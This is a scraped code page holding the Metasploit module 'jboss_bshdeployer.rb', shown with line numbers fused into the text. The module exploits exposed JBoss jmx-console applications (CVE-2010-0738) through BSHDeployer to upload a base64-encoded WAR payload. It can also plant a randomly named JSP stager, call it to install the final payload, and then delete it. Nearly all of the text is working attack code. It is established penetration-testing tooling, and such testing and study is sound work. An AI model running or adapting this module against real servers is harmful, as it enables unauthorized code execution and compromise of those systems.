Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/admin/http/jboss_bshdeployer.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HTTP::JBoss78def initialize9super(10'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',11'Description' => %q{12This module can be used to install a WAR file payload on JBoss servers that have13an exposed "jmx-console" application. The payload is put on the server by14using the jboss.system:BSHDeployer's createScriptDeployment() method.15},16'Author' => [17'us3r777 <us3r777[at]n0b0.so>'18],19'References' => [20[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST21[ 'OSVDB', '64171' ],22[ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],23[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]24],25'Actions' => [26['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],27['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]28],29'DefaultAction' => 'Deploy',30'License' => BSD_LICENSE,31)3233register_options(34[35Opt::RPORT(8080),36OptString.new('APPBASE', [ true, 'Application base name', 'payload']),37OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])38]39)40end4142def deploy_action(app_base, war_data)43encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')4445if http_verb == 'POST'46print_status('Deploying payload...')47opts = {48file: "#{app_base}.war",49contents: encoded_payload50}51else52print_status('Deploying stager...')53stager_name = Rex::Text.rand_text_alpha(rand(8..15))54stager_contents = stager_jsp(app_base)55opts = {56dir: "#{stager_name}.war",57file: "#{stager_name}.war/#{stager_name}.jsp",58contents: Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')59}60end6162bsh_payload = generate_bsh(:create, opts)63package = deploy_bsh(bsh_payload)6465if package.nil?66print_error('Deployment failed')67return68else69print_good('Deployment successful')70end7172unless http_verb == 'POST'73# call the stager to deploy our real payload war74stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'75payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}"76print_status("Calling stager #{stager_uri} to deploy final payload...")77res = deploy('method' => 'POST',78'data' => payload_data,79'uri' => stager_uri)80if res && res.code == 20081print_good('Payload deployed')82else83print_error('Failed to deploy final payload')84end8586# Remove the stager87print_status('Removing stager...')88files = {}89files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"90files[:stager_base] = "#{stager_name}.war"91delete_script = generate_bsh(:delete, files)92res = deploy_package(delete_script, package)93if res.nil?94print_error('Unable to remove Stager')95else96print_good('Stager successfully removed')97end98end99end100101def undeploy_action(app_base)102# Undeploy the WAR and the stager if needed103print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")104105files = {}106files[:app_base] = "#{app_base}.war"107delete_script = generate_bsh(:delete, files)108109package = deploy_bsh(delete_script)110if package.nil?111print_error('Unable to remove WAR')112else113print_good('Successfully removed')114end115end116117def run118app_base = datastore['APPBASE']119120case action.name121when 'Deploy'122unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])123print_error('WAR file not found')124return125end126war_data = File.read(datastore['WARFILE'], mode: 'rb')127deploy_action(app_base, war_data)128when 'Undeploy'129undeploy_action(app_base)130end131end132end133134135